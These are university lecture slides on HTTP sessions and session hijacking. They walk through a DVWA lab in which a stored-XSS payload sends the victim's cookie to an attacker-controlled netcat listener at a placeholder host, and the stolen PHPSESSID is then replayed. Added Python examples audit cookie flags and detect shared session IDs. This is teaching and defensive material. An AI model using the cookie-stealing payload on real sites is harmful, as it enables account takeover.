
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.


Slide 1: Session Hijacking
NAVY Research Group, Department of Computer Science, Faculty of Electrical Engineering and Computer Science, VŠB-TUO, 17. listopadu 15, 708 33 Ostrava-Poruba, Czech Republic

Slide 2: HTTP protocol
The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. HTTP has been in use by the World-Wide Web global information initiative since 1990.

Slide 3: HTTP protocol
- RFC 7230 - HTTP/1.1: Message Syntax and Routing
- RFC 7231 - HTTP/1.1: Semantics and Content
- RFC 7232 - HTTP/1.1: Conditional Requests
- RFC 7233 - HTTP/1.1: Range Requests
- RFC 7234 - HTTP/1.1: Caching
- RFC 7235 - HTTP/1.1: Authentication
(http://trac.tools.ietf.org/)

Slide 4: HTTP protocol
Client request:

    GET /hello.txt HTTP/1.1
    User-Agent: curl/7.16.3 libcurl/7.16.3 OpenSSL/0.9.7l zlib/1.2.3
    Host: www.example.com
    Accept-Language: en, mi
    …

Slide 5: HTTP protocol
Server response:

    HTTP/1.1 200 OK
    Date: Mon, 27 Jul 2009 12:28:53 GMT
    Server: Apache
    Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT
    ETag: "34aa387-d-1568eb00"
    Accept-Ranges: bytes
    Content-Length: 51
    Vary: Accept-Encoding
    Content-Type: text/plain

    Hello World! My payload includes a trailing CRLF.

Slide 6: Session
A session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and a user (login session). A session is set up or established at a certain point in time and torn down at some later point.
- An established communication session may involve more than one message in each direction.
- A session is typically stateful, meaning that at least one of the communicating parties needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.

Slide 7: Session
An HTTP session is a sequence of network request-response transactions.
- An HTTP client initiates a request by establishing a Transmission Control Protocol (TCP) connection to a particular port on a server (typically port 80).
- An HTTP server listening on that port waits for a client's request message.
- Upon receiving the request, the server sends back a status line, such as "HTTP/1.1 200 OK", and a message of its own.
- The body of this message is typically the requested resource, although an error message or other information may also be returned.

Slide 8: Session

Slide 9: Session
HTTP is a stateless protocol. HTTP servers require sessions to retain information or status about each user for the duration of multiple requests. Some web applications implement state, or server-side sessions, using for instance HTTP cookies, hidden variables within web forms, or encoded parameters in the URL.

Slide 10: Session

Slide 11: Session hijacking
Session hijacking is when an attacker takes over a session between two systems (machines). The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed through a session token.
- Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user's connections.
- The most useful method relies on a token that the web server sends to the client browser after a successful client authentication.
- A session token is normally composed of a string of variable width and it can be carried in different ways: in the URL, in the header of the HTTP request as a cookie, in other parts of the header of the HTTP request, or in the body of the HTTP request.
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the web server.

Slide 12: Session hijacking
The session token can be compromised in different ways; the most common are:
- Predictable session token
- Session sniffing
- Client-side attacks (XSS, malicious JavaScript code, Trojans, etc.)
- Man-in-the-middle attack

Slide 13: Session hijacking - Session Sniffing

Slide 14: Session hijacking - Man in the middle

Slide 15: Session hijacking - XSS (Cross Site Scripting)

Slide 16: Session hijacking - XSS (Cross Site Scripting)
Injection vectors: IMG SRC, SCRIPT SRC, IFRAME SRC (the src attribute of an img, script or iframe element).

JavaScript Image object:

    // Setting src on a new Image makes the browser issue a GET request to that URL
    // with no user interaction; the query string carries whatever the script appends.
    var img = new Image();
    img.src = "http://host/?command";

'XMLHTTP' object in IE:

    var post_data = 'name=value';
    var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    xmlhttp.open("POST", 'http://url/path/file.ext', true);   // true = asynchronous
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4) {                         // 4 = request complete
            alert(xmlhttp.responseText);
        }
    };
    xmlhttp.send(post_data);

'XMLHTTP' object in Mozilla:

    var post_data = 'name=value';
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", 'http://url/path/file.ext', true);
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4) {
            alert(xmlhttp.responseText);
        }
    };
    xmlhttp.send(post_data);

Slide 17: Demo - Tools
- Hosted web application (DVWA)
- Basic knowledge of JavaScript
- Custom application able to handle HTTP requests (e.g. Netcat - http://www.linuxcommand.org/man_pages/nc1.html)

Slide 18: Demo
1. Attacker logs into the target web application as a common user.
   http://127.0.0.1/dvwa/login.php
   User name: smithy
   Password: password
2. Try the XSS vulnerability of a text input. Type in:

    <script>alert('XSS!'); alert(document.cookie);</script>

Slide 19: Demo

Slide 20: Demo
Attacker logs into Kali Linux.
    Username: root
    Password: toor
Determine your attacker's IP address:

    root@kali:~# ifconfig eth0

Slide 21: Demo
Use the Netcat utility to listen for incoming HTTP requests (TCP port 80):

    root@kali:~# netcat -lvp 80

    -l … listen mode, for inbound connects
    -v … verbose [use twice to be more verbose]
    -p port … local port number

Slide 22: Demo
In DVWA navigate to the XSS Stored (Guest Book) section.
- This section represents a guest book. Records are stored in the DB.
Add a new record with your malicious script which will hijack the victim's session ID.
- HOST is your attacker's PC IP address.

Slide 23: Demo

    var img = new Image();
    img.src = "http://HOST/MyNetcatServiceListener?cookie=" + document.cookie;

Slide 24: Demo
Now whoever visits the Guest Book will execute your XSS code and send the cookie with the SESSIONID to your attacker's PC.
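The exfiltration on this slide only works because the session cookie is readable from script. As an added example (not part of the original slides or of DVWA), this Python audit parses the Set-Cookie headers of a raw HTTP response in the style of slide 5 and reports, for the session cookie, the flags whose absence enables this step; the set of session cookie names, the sample response and its cookie values are constructed assumptions.

```python
"""Audit the Set-Cookie headers of a raw HTTP/1.1 response for hijack-relevant flags."""

# Cookie names treated as session cookies (assumption: PHPSESSID as in the demo, plus common ones).
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "sessionid", "session", "sid"}


def parse_set_cookies(raw_response):
    """Return one dict per Set-Cookie header: name, value and lower-cased attributes."""
    head = raw_response.split("\r\n\r\n", 1)[0]   # headers end at the first blank line
    cookies = []
    for line in head.split("\r\n")[1:]:            # [1:] skips the status line
        hname, sep, hvalue = line.partition(":")
        if not sep or hname.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in hvalue.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {}
        for attr in parts[1:]:
            k, _, v = attr.partition("=")
            attrs[k.strip().lower()] = v.strip().lower()
        cookies.append({"name": name.strip(), "value": value, "attrs": attrs})
    return cookies


def audit_session_cookies(raw_response):
    """Map each session cookie name to the weaknesses that let injected script read and leak it."""
    findings = {}
    for c in parse_set_cookies(raw_response):
        if c["name"].lower() not in SESSION_COOKIE_NAMES:
            continue
        attrs, issues = c["attrs"], []
        if "httponly" not in attrs:
            issues.append("missing HttpOnly: readable from script via document.cookie")
        if "secure" not in attrs:
            issues.append("missing Secure: sent over plain HTTP, exposed to sniffing")
        if attrs.get("samesite", "") not in ("lax", "strict"):
            issues.append("SameSite not Lax/Strict: attached to cross-site requests")
        findings[c["name"]] = issues
    return findings


# Constructed sample response in the style of the slide-5 example (not captured from DVWA).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=constructed0123456789abcdef; path=/\r\n"
    "Set-Cookie: security=low; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)
```

With HttpOnly set, `document.cookie` on slide 23 no longer returns the PHPSESSID, so the guest-book script has nothing to send.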

Slide 25: Demo
Use the hijacked cookie to bypass the authentication. On your attacker's PC open a browser and navigate to the DVWA web page.

Slide 26: Demo
Open the Tamper Data plugin and start Tamper. Fill in a non-existent user name and password to get your own session. In the Tamper Data plugin edit the PHPSESSID value to the value you received from the hijacked cookie.

Slide 27: Demo

Slide 28: Demo
You will get an "Authentication failed" message (you entered non-existent credentials).

Slide 29: Demo
Now navigate back to the root of the web page and you should be logged in under your victim's account. Done!
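The final step presents the victim's PHPSESSID from the attacker's machine, which leaves a server-side footprint: one session ID used by two different clients. As an added example (not from the slides or from DVWA), this Python check parses access-log lines and flags such session IDs; it assumes a log format in which the PHPSESSID cookie value is appended to the combined log format as a last quoted field, and all log lines, addresses and session IDs are constructed.

```python
"""Flag a session ID presented from more than one client, the footprint a hijack leaves server-side."""
import re
from collections import defaultdict

# Assumed log format (not DVWA's or Apache's default): the combined log format with the
# PHPSESSID cookie value appended as one more quoted field (Apache: %{PHPSESSID}C).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<sid>[^"]*)"$'
)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shared_sessions(lines):
    """Return {session_id: {(ip, user_agent), ...}} for IDs used by two or more distinct clients."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["sid"] not in ("", "-"):     # "-" means no PHPSESSID cookie was sent
            seen[rec["sid"]].add((rec["ip"], rec["ua"]))
    return {sid: clients for sid, clients in seen.items() if len(clients) > 1}


# Constructed log lines (not real captures). The victim browses from 10.0.0.5 with Firefox;
# later the same PHPSESSID arrives from 10.0.0.99 with a different browser, as in the demo's
# final step, while a second user's session stays bound to one client.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2015:10:00:01 +0100] "GET /dvwa/index.php HTTP/1.1" 200 1532 '
    '"-" "Mozilla/5.0 Firefox/36.0" "sess_victim_constructed"',
    '10.0.0.5 - - [01/Mar/2015:10:00:09 +0100] "GET /dvwa/index.php HTTP/1.1" 200 1532 '
    '"http://127.0.0.1/dvwa/login.php" "Mozilla/5.0 Firefox/36.0" "sess_victim_constructed"',
    '10.0.0.7 - - [01/Mar/2015:10:01:30 +0100] "GET /dvwa/index.php HTTP/1.1" 200 1532 '
    '"-" "Mozilla/5.0 Chrome/40.0" "sess_other_constructed"',
    '10.0.0.99 - - [01/Mar/2015:10:02:15 +0100] "GET /dvwa/login.php HTTP/1.1" 200 1280 '
    '"-" "Mozilla/5.0 Iceweasel/31.0" "-"',
    '10.0.0.99 - - [01/Mar/2015:10:02:40 +0100] "GET /dvwa/index.php HTTP/1.1" 200 1532 '
    '"-" "Mozilla/5.0 Iceweasel/31.0" "sess_victim_constructed"',
]

if __name__ == "__main__":
    for sid, clients in find_shared_sessions(SAMPLE_LOG).items():
        print(sid, "used by", sorted(clients))
```

Regenerating the session ID on login and invalidating it when the bound client changes closes the replay the slides demonstrate; this check is the detection counterpart for sessions already in flight.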

Slide 30: References
- DVWA - http://www.dvwa.co.uk/
- Netcat tool - http://netcat.sourceforge.net/
- CSRF - http://www.cgisecurity.com/csrf-faq.html
- https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
- HACKING EXPOSED (ISBN: 978-0-07-161375-0)
- Penetration testing (ISBN-10: 1-59327-564-1)
- Principles of Computer Security (ISBN: 978-0-07-174857-5)

Slide 31: Warning
Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.

